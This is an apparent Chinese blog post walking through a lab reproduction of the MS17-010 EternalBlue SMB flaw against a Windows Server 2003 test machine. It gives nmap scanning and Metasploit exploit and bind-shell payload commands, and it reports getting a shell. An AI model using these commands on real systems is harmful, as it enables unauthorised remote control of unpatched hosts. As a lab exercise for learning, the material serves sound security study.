ms17-010
最进无聊学了点新技术,就赶紧来分享给大家的我真的是个带好人啊
漏洞描述
Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞
复现环境
攻击机:Manjaro linux .(Manjaro环境搭建)
靶机 : Windows Server 2003 SP2
IP:192.168.214.128
过程
- nmap 扫描
nmap -script=vuln 192.168.214.128
发现存在ms17-010
- msf入侵
- 扫描模块
msf5 > search ms17-010
这里使用最新的exploit/windows/smb/ms17_010_psexec
- 选择模块
msf5 > use exploit/windows/smb/ms17_010_psexec
- 设置ip
msf5 > set payload windows/shell_bind_tcp
- run
msf5 > run
成功获得shell
2020-1-10